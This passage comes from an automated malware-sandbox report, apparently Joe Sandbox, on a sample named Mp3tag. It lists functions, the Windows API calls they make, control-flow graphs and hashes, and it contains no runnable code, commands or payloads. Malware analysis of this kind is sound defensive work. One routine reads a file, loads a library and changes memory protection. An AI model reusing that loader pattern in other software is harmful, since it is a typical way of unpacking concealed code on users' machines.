                                                                                                            • Opcode ID: 22b67aa5bc6254f9f6b56880fc4d7a1d85e87879da1aecc30c6c2f5ed121f6e5
                                                                                                            • Instruction ID: 42f899f76c67ab6ff5bf65fb92ea60525046fbecff192d390262b959f5714990
                                                                                                            • Opcode Fuzzy Hash: 22b67aa5bc6254f9f6b56880fc4d7a1d85e87879da1aecc30c6c2f5ed121f6e5
                                                                                                            • Instruction Fuzzy Hash: 3F11097494AF1899F711EB6ABC6A38737B0BB1D30AF50051FD14946362EB7C4148CF9A
                                                                                                            Function 004D33C0 Relevance: 2.7, APIs: 2, Instructions: 243sleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 175 4d33c0-4d33ee 176 4d3629-4d3630 175->176 177 4d33f4-4d3401 175->177 180 4d376e-4d3774 176->180 181 4d3636-4d3648 176->181 178 4d3471-4d347a 177->178 179 4d3403-4d3418 177->179 178->179 186 4d347c-4d3489 178->186 182 4d341a-4d342a 179->182 183 4d3434-4d3443 179->183 187 4d377b-4d3783 180->187 188 4d3776 call 4d3100 180->188 184 4d364f-4d3670 181->184 185 4d364a call 4d2e40 181->185 189 4d345d-4d346c 182->189 190 4d342c-4d342f 182->190 191 4d34dc-4d34de 183->191 192 4d3449-4d3458 183->192 194 4d367c-4d368b 184->194 195 4d3672-4d367a 184->195 185->184 186->179 196 4d348f-4d349c 186->196 188->187 189->187 190->187 198 4d34e5-4d34ef 191->198 199 4d34e0 call 4d2e40 191->199 192->187 201 4d368d-4d369e 194->201 202 4d36a0-4d36a8 194->202 200 4d36e2-4d3703 195->200 196->179 203 4d34a2-4d34b5 196->203 207 4d34f5-4d3538 198->207 208 4d3584-4d3590 198->208 199->198 205 4d3705-4d3717 200->205 206 4d3720-4d3732 200->206 201->200 209 4d36ce-4d36d0 call 4d3000 202->209 210 4d36aa-4d36cc 202->210 203->178 211 4d34b7-4d34ca Sleep 203->211 205->206 215 4d3719 205->215 218 4d3754 206->218 219 4d3734-4d374b 206->219 216 4d354e-4d3562 207->216 217 4d353a-4d3545 207->217 220 4d35bc-4d35c2 call 4d3000 208->220 221 4d3592-4d35a6 208->221 212 4d36d5-4d36dd 209->212 210->212 211->179 213 4d34d0-4d34da Sleep 211->213 212->187 213->178 215->206 226 4d35dc 216->226 227 4d3564-4d3582 call 4d2ef0 216->227 217->216 223 4d3547 217->223 225 4d3759-4d376c 218->225 224 4d374d-4d3752 call 4d2ef0 219->224 219->225 231 4d35c7-4d35cd 220->231 228 4d35a8 221->228 229 4d35aa-4d35ba 221->229 223->216 224->225 225->187 230 4d35e1-4d3624 226->230 227->230 228->229 229->230 230->187 231->230 234 4d35cf-4d35d7 231->234 234->187
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(?,?,?,?,004D3385), ref: 004D34BC
                                                                                                            • Sleep.KERNEL32(?,?,?,?,004D3385), ref: 004D34D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 4c9655a6c0adc59d052be7f8f3d2e1d4f18074e7aad082d6f4edab94988b3583
                                                                                                            • Instruction ID: f52fb9a6aa0a106b3ccfdcaf64509dbc4cd03f19e32cc9f85b5f75e80cf28c2c
                                                                                                            • Opcode Fuzzy Hash: 4c9655a6c0adc59d052be7f8f3d2e1d4f18074e7aad082d6f4edab94988b3583
                                                                                                            • Instruction Fuzzy Hash: 4CB156B3205F8086D715CF29E8603AE77A1F348B65F18822BC79947394DB7CDA96C346
                                                                                                            Function 004DC830 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemDefaultUILanguage.KERNEL32 ref: 004DC99D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultLanguageSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4166810957-0
                                                                                                            • Opcode ID: 8278241e2a6f2df6354df28a26e9de992d855de54469c1bcebeb21921ee2593a
                                                                                                            • Instruction ID: 601edd58b41010e957fc92b2afc6c11a2e7556efa6d6f09383bf37398e159bef
                                                                                                            • Opcode Fuzzy Hash: 8278241e2a6f2df6354df28a26e9de992d855de54469c1bcebeb21921ee2593a
                                                                                                            • Instruction Fuzzy Hash: E751E576200B8089DB20EF76C8A53DE2762F74479CF50515BEA0E87B59DF78C985C384
                                                                                                            Function 004D8160 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 289 4d8160-4d8184 290 4d818d-4d81da GetCurrentThreadId 289->290 291 4d8186 289->291 292 4d81dc-4d81e6 290->292 293 4d81e8 290->293 291->290 294 4d81f0-4d8231 292->294 293->294 295 4d823c 294->295 296 4d8233-4d823a 294->296 297 4d8245-4d824d 295->297 296->295 296->297 298 4d824f-4d8255 297->298 299 4d8262-4d8269 297->299 298->299 300 4d826b 299->300 301 4d8274-4d827c 299->301 300->301 302 4d827e-4d828a call 4d5630 301->302 303 4d8290-4d8297 301->303 302->303 305 4d8299 call 4d80b0 303->305 306 4d82a0 call 4d8920 303->306 310 4d829e 305->310 311 4d82a5-4d82b2 306->311 310->311
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004D81CA
                                                                                                              • Part of subcall function 004D8920: GetCurrentThreadId.KERNEL32 ref: 004D8950
                                                                                                              • Part of subcall function 004D8920: FreeLibrary.KERNEL32 ref: 004D8A46
                                                                                                              • Part of subcall function 004D8920: ExitProcess.KERNEL32 ref: 004D8A9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 274535261-0
                                                                                                            • Opcode ID: bc6cb27685d170801dc153e54490b559740cdb6ce67cc7e3b3695f5ee6859b39
                                                                                                            • Instruction ID: 1c634caf0a2ead7a4ddaa6139b346c8901ece1ee096b597f37ba4f945f69809a
                                                                                                            • Opcode Fuzzy Hash: bc6cb27685d170801dc153e54490b559740cdb6ce67cc7e3b3695f5ee6859b39
                                                                                                            • Instruction Fuzzy Hash: FB313932204BC8DADB21DF21EC587EA37B9F709759F80016ADA4907764CF788A8AC744
                                                                                                            Function 004DCA80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 004DCABC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: 6b88832efa649a767e80d14081b9a48ae2195aa9ede3a8c18e56164f06fec982
                                                                                                            • Instruction ID: 0a12b77be51b49a70bb894de1e0d49c684df9ca75c60d552e25b42b27ab838cd
                                                                                                            • Opcode Fuzzy Hash: 6b88832efa649a767e80d14081b9a48ae2195aa9ede3a8c18e56164f06fec982
                                                                                                            • Instruction Fuzzy Hash: CC115A32221A5089DB20EF71C4A13DE37A5E74478CF40201BFA0E87B48DF39C988C394
                                                                                                            Function 004D7150 Relevance: 1.5, APIs: 1, Instructions: 42filelibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 329 4d7150-4d720d call 4d765e CreateFileW call 4d765e 335 4d720f-4d7211 329->335 336 4d7216-4d7305 call 4d765e ReadFile 329->336 337 4d75d5-4d75dc 335->337 340 4d731f-4d732a 336->340 341 4d732c-4d7341 340->341 342 4d7343-4d74e2 call 4d765e * 2 LoadLibraryA VirtualProtect 340->342 341->340 348 4d74ef-4d752b VirtualProtect 342->348 349 4d74ea call 4d6e7e 342->349 350 4d7533-4d7547 348->350 349->348 351 4d7579-4d75d3 350->351 352 4d7549-4d7577 350->352 351->337 352->350
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateLibraryLoadRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292244806-0
                                                                                                            • Opcode ID: efd5595c977a8a0e6c139ffeb25316ac5e8276f53f6fa1802eea0287adffb4c9
                                                                                                            • Instruction ID: 6e8277c378e37ab448a43a69c840feb28d409a6ad9b099c0699490ece7fd88b4
                                                                                                            • Opcode Fuzzy Hash: efd5595c977a8a0e6c139ffeb25316ac5e8276f53f6fa1802eea0287adffb4c9
                                                                                                            • Instruction Fuzzy Hash: 56114F3A618A84CAD760DB1AE49075EBBB1F3C9B90F118116EF8943B28DF39D844DF00
                                                                                                            Function 004D6FCE Relevance: 1.3, APIs: 1, Instructions: 62memoryfileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 354 4d6fce-4d70b2 call 4d777e call 4d765e LocalAlloc call 4d765e 362 4d70b6-4d70d7 354->362 363 4d70d9-4d70f5 362->363 364 4d70f7 362->364 363->362 365 4d70ff-4d7111 364->365 367 4d714a-4d7166 365->367 368 4d7113-4d7148 365->368 369 4d716e-4d720d CreateFileW call 4d765e 367->369 370 4d7169 call 4d765e 367->370 368->365 374 4d720f-4d7211 369->374 375 4d7216-4d7305 call 4d765e ReadFile 369->375 370->369 376 4d75d5-4d75dc 374->376 379 4d731f-4d732a 375->379 380 4d732c-4d7341 379->380 381 4d7343-4d74e2 call 4d765e * 2 LoadLibraryA VirtualProtect 379->381 380->379 387 4d74ef-4d752b VirtualProtect 381->387 388 4d74ea call 4d6e7e 381->388 389 4d7533-4d7547 387->389 388->387 390 4d7579-4d75d3 389->390 391 4d7549-4d7577 389->391 390->376 391->389
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(004D7EBD), ref: 004D7041
                                                                                                            • CreateFileW.KERNELBASE ref: 004D71B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCreateFileLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2038206053-0
                                                                                                            • Opcode ID: a91c563a33bb0e0a1e5805845016af9994f936b7970f6db1ab1db1c9b76536f8
                                                                                                            • Instruction ID: 1c127f9eb0588b955944715dab3eaeeb731cce0810cef229e23112d23eead9ae
                                                                                                            • Opcode Fuzzy Hash: a91c563a33bb0e0a1e5805845016af9994f936b7970f6db1ab1db1c9b76536f8
                                                                                                            • Instruction Fuzzy Hash: CB314876208B848AC764DB19E49075EB7B5F389B90F21441AEB8D83B68DF39D845CF00

                                                                                                            Non-executed Functions

                                                                                                            Function 004DBD50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirstlstrlen
                                                                                                            • String ID: GetLongPathNameW$kernel32.dll
                                                                                                            • API String ID: 2767606509-568771998
                                                                                                            • Opcode ID: 2665e3b94bfe25624f7e04fb04d0b8ae093503aa6e9cf72ce73661df732d25d2
                                                                                                            • Instruction ID: 9658c246f48189b55a1ddf1e1b9350a59bec1c7f179a36ac8c70c0943080b222
                                                                                                            • Opcode Fuzzy Hash: 2665e3b94bfe25624f7e04fb04d0b8ae093503aa6e9cf72ce73661df732d25d2
                                                                                                            • Instruction Fuzzy Hash: 48519222300A44D4CB21DF26D9653E92761FB44BACF46922BEE1E57754EF7CC585C388
                                                                                                            Function 004DB390 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 31libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,004DD46D), ref: 004DB39B
                                                                                                            • GetVersion.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3A9
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3D0
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3DF
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3F2
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB401
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB414
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB423
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                                            • API String ID: 74573329-1403180336
                                                                                                            • Opcode ID: a5f62936e888c5de3436546e656f9a8fda71b3b8aca561aab0a6b158481b938a
                                                                                                            • Instruction ID: 542946db3e396960ea5a1d2c0c6e8ee267dc15986e3fc510a2c74ec6e324a770
                                                                                                            • Opcode Fuzzy Hash: a5f62936e888c5de3436546e656f9a8fda71b3b8aca561aab0a6b158481b938a
                                                                                                            • Instruction Fuzzy Hash: 1E011D71241E55D0FA15EB12EDA23D72768EB64706F95022BD24E46333EFEC8645C788
                                                                                                            Function 004D44E0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 336windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: 4-M$=-M$E-M$P-M$^-M$b-M
                                                                                                            • API String ID: 2030045667-4120786582
                                                                                                            • Opcode ID: 3eed2e83dfb6a7be749d4921041949b5582f16563363a55fcef9339b9722d487
                                                                                                            • Instruction ID: 0731902bd4ff9a3f83eb095b7458f5cc1b99b4b6a3f09df41997d6f1432a3357
                                                                                                            • Opcode Fuzzy Hash: 3eed2e83dfb6a7be749d4921041949b5582f16563363a55fcef9339b9722d487
                                                                                                            • Instruction Fuzzy Hash: 24D15C32711B908BDB519F35ECA479A27A0F79979CF045127EE4E87B89DB38C8858304
                                                                                                            Function 004D6C50 Relevance: 10.6, APIs: 7, Instructions: 150threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: 54b8d3a62475870eb52297588eecad8aef7af839a91c08c1c448b13a2dd73674
                                                                                                            • Instruction ID: 354bbb3018e8b7406b4898064c7bf96e37b10ebd60c25c0f2c49ef4c509fb73a
                                                                                                            • Opcode Fuzzy Hash: 54b8d3a62475870eb52297588eecad8aef7af839a91c08c1c448b13a2dd73674
                                                                                                            • Instruction Fuzzy Hash: 8541E5363016118DDB189E3AD97036B2B91F749BACB17512FEE0D83754CA7DC8858784
                                                                                                            Function 004D8840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID: Error$Runtime error at 0000000000000000
                                                                                                            • API String ID: 3320372497-326393251
                                                                                                            • Opcode ID: 80a1c5bf2f94d13c86562c33573aabb6c1779ad0f4996c1b29b72bbd5a3ee485
                                                                                                            • Instruction ID: 40c57a2a6af2a79307986fd85f6ea12eb42848740f6b7ba218427c19f9530fdf
                                                                                                            • Opcode Fuzzy Hash: 80a1c5bf2f94d13c86562c33573aabb6c1779ad0f4996c1b29b72bbd5a3ee485
                                                                                                            • Instruction Fuzzy Hash: B01184A1708A4494FB11EB61EC353E73371A758755F80121FE9A9067E5DFBCC684CB0A
                                                                                                            Function 004DDBB5 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
